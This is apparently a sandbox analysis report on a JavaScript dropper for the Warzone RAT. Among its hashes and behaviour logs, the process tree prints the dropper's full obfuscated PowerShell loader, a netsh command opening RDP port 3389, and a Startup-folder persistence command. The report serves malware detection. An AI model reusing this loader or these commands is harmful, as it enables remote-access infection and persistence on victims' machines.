Analysis
-
max time kernel
189s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2022 04:11
Static task
static1
Behavioral task
behavioral1
Sample
Purchase Enquiry .js
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Purchase Enquiry .js
Resource
win10v2004-20221111-en
General
-
Target
Purchase Enquiry .js
-
Size
1KB
-
MD5
840422981206fe204ad674b563497eee
-
SHA1
fbadcc5fa1e489d965591d769da3bf7039fc5b7f
-
SHA256
76522e1121f296222f3a9c9913638e5e6e9ab4be9206fc86ed32c1827b44b689
-
SHA512
8cc95a62d66b7afcb8f402b4603773a3d3b877cdbf0c07492f75cc3b5bfc6e5cb91aa0997509b0e939a187ad8037d766ba23a4c3758da94a31940a4fc348d9ee
Malware Config
Signatures
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzone RAT payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4216-141-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/4216-142-0x000000000040B556-mapping.dmp warzonerat behavioral2/memory/4216-146-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/4216-147-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat behavioral2/memory/4216-155-0x0000000000400000-0x0000000000568000-memory.dmp warzonerat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 61 2624 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
10.exepid process 4296 10.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
InstallUtil.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" InstallUtil.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\10.exe upx C:\Users\Admin\AppData\Local\Temp\10.exe upx behavioral2/memory/4296-154-0x0000000000F70000-0x0000000000F9D000-memory.dmp upx behavioral2/memory/4296-156-0x0000000000F70000-0x0000000000F9D000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 3 IoCs
Processes:
powershell.exesvchost.exepid process 2624 powershell.exe 2624 powershell.exe 660 svchost.exe -
Drops file in System32 directory 1 IoCs
Processes:
InstallUtil.exedescription ioc process File created C:\Windows\System32\rfxvmt.dll InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2624 set thread context of 4216 2624 powershell.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
InstallUtil.exedescription ioc process File created C:\Program Files\Microsoft DN1\rdpwrap.ini InstallUtil.exe File created C:\Program Files\Microsoft DN1\sqlmap.dll InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
IEXPLORE.EXEiexplore.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999674" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1710812510" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1710812510" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0d6286b7a04d901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999674" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000d4cdf2497b95897b0310f027564b4167a903f7ee54c18eb36bad7a00a280ebd7000000000e80000000020000200000002121cbac3ac4bf1bf38ed1df965dcff9e9022cb6a62f8f1f557fd3c70594e04120000000b3e38344a179e2ee0737271b950205d24ed1613ee52168a0d24f7ec4ca5903d94000000045ee364202ea7c049541c4a55d2769d77646a1380786095cc3198b6162831a886fc38142372f201fdfa5a8f7de0554045d288075af3ab9353fd8e958aa1cf2b3 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6851ef31fd3cf49b332bbb4721c974800000000020000000000106600000001000020000000dcd1f896bb636cf266d2dbcc3f9a9ab583d32be212a56f2fc7391a982e2cf884000000000e80000000020000200000008d1643328149726fa4ad7817cb8fcbbae7770cd942354e6d3c65b42a766b874f20000000c4f5bcf9ecaacda958b08c0c794f13e60f108b4ed97c966f93bd624933d37709400000000971840e94939a0888fd98c78ba7a69e15390c11c6226fb7aaf65f6acf8cd8404a449c7fdb3854401aea22e1c0d2249378b1e3ee583e8467970ed1f35e5c71fc iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "375947023" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 808d306d7a04d901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{880ABA97-706D-11ED-919F-FAE5CAF4041A} = "0" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exesvchost.exepid process 2624 powershell.exe 4296 powershell.exe 2624 powershell.exe 4296 powershell.exe 2624 powershell.exe 2624 powershell.exe 660 svchost.exe 660 svchost.exe 660 svchost.exe 660 svchost.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 640 640 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 4296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
powershell.exepowershell.exeInstallUtil.exesvchost.exedescription pid process Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 4296 powershell.exe Token: SeIncreaseQuotaPrivilege 2624 powershell.exe Token: SeSecurityPrivilege 2624 powershell.exe Token: SeTakeOwnershipPrivilege 2624 powershell.exe Token: SeLoadDriverPrivilege 2624 powershell.exe Token: SeSystemProfilePrivilege 2624 powershell.exe Token: SeSystemtimePrivilege 2624 powershell.exe Token: SeProfSingleProcessPrivilege 2624 powershell.exe Token: SeIncBasePriorityPrivilege 2624 powershell.exe Token: SeCreatePagefilePrivilege 2624 powershell.exe Token: SeBackupPrivilege 2624 powershell.exe Token: SeRestorePrivilege 2624 powershell.exe Token: SeShutdownPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeSystemEnvironmentPrivilege 2624 powershell.exe Token: SeRemoteShutdownPrivilege 2624 powershell.exe Token: SeUndockPrivilege 2624 powershell.exe Token: SeManageVolumePrivilege 2624 powershell.exe Token: 33 2624 powershell.exe Token: 34 2624 powershell.exe Token: 35 2624 powershell.exe Token: 36 2624 powershell.exe Token: SeIncreaseQuotaPrivilege 2624 powershell.exe Token: SeSecurityPrivilege 2624 powershell.exe Token: SeTakeOwnershipPrivilege 2624 powershell.exe Token: SeLoadDriverPrivilege 2624 powershell.exe Token: SeSystemProfilePrivilege 2624 powershell.exe Token: SeSystemtimePrivilege 2624 powershell.exe Token: SeProfSingleProcessPrivilege 2624 powershell.exe Token: SeIncBasePriorityPrivilege 2624 powershell.exe Token: SeCreatePagefilePrivilege 2624 powershell.exe Token: SeBackupPrivilege 2624 powershell.exe Token: SeRestorePrivilege 2624 powershell.exe Token: SeShutdownPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeSystemEnvironmentPrivilege 2624 powershell.exe Token: SeRemoteShutdownPrivilege 2624 powershell.exe Token: SeUndockPrivilege 2624 powershell.exe Token: SeManageVolumePrivilege 2624 powershell.exe Token: 33 2624 powershell.exe Token: 34 2624 powershell.exe Token: 35 2624 powershell.exe Token: 36 2624 powershell.exe Token: SeDebugPrivilege 4216 InstallUtil.exe Token: SeAuditPrivilege 660 svchost.exe Token: SeAuditPrivilege 660 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 3136 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
iexplore.exeIEXPLORE.EXEInstallUtil.exepid process 3136 iexplore.exe 3136 iexplore.exe 3804 IEXPLORE.EXE 3804 IEXPLORE.EXE 4216 InstallUtil.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
iexplore.exewscript.exepowershell.exeInstallUtil.exe10.exedescription pid process target process PID 3136 wrote to memory of 3804 3136 iexplore.exe IEXPLORE.EXE PID 3136 wrote to memory of 3804 3136 iexplore.exe IEXPLORE.EXE PID 3136 wrote to memory of 3804 3136 iexplore.exe IEXPLORE.EXE PID 3080 wrote to memory of 2624 3080 wscript.exe powershell.exe PID 3080 wrote to memory of 2624 3080 wscript.exe powershell.exe PID 3080 wrote to memory of 4296 3080 wscript.exe powershell.exe PID 3080 wrote to memory of 4296 3080 wscript.exe powershell.exe PID 2624 wrote to memory of 1476 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 1476 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 1476 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 2624 wrote to memory of 4216 2624 powershell.exe InstallUtil.exe PID 4216 wrote to memory of 4296 4216 InstallUtil.exe 10.exe PID 4216 wrote to memory of 4296 4216 InstallUtil.exe 10.exe PID 4216 wrote to memory of 4296 4216 InstallUtil.exe 10.exe PID 4296 wrote to memory of 3328 4296 10.exe netsh.exe PID 4296 wrote to memory of 3328 4296 10.exe netsh.exe PID 4296 wrote to memory of 3328 4296 10.exe netsh.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115511,51155551,55151111,51115511,51155551,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵PID:1476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Sets DLL path for service in the registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=33895⤵
- Modifies Windows Firewall
PID:3328
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:2708
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3136 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3804
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD566b4a80f1b0588c784539ea6dec3eaa9
SHA12ea8813d84065ebc0e369dd71657b58c5913b181
SHA2569d88259ba2d167100b8a8cba6725b04fc6ed6c212e739fc1dedff490bb416197
SHA51288731f658558df0d287b31f48501ff34905ce6d968d1b43a1924e4f1fa60fc2afe846c6c3e2f27f898c33ab6c6128c1df6d01051feae1a365f7e4080aa8e6937
-
Filesize
70KB
MD5ca96229390a0e6a53e8f2125f2c01114
SHA1a54b1081cf58724f8cb292b4d165dfee2fb1c9f6
SHA2560df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c
SHA512e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef
-
Filesize
70KB
MD5ca96229390a0e6a53e8f2125f2c01114
SHA1a54b1081cf58724f8cb292b4d165dfee2fb1c9f6
SHA2560df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c
SHA512e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
291KB
MD5914d30cdc026d77366e6ac105cd5eefc
SHA195e0c8463f4995bf126fa0cffab4a8a947963a1a
SHA256f00109618610375ea494b1406fa7e5548d75a52669b1bf1761a80394301b42f8
SHA512184c1c12c18b02e27a8674476c768b0dcaef7dff722dfd27e4f342ba7ce65653c399eed0bedc3d9cbca0fec0fa5a17077e8e71f4d7807e2119eec1687ccc7635
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26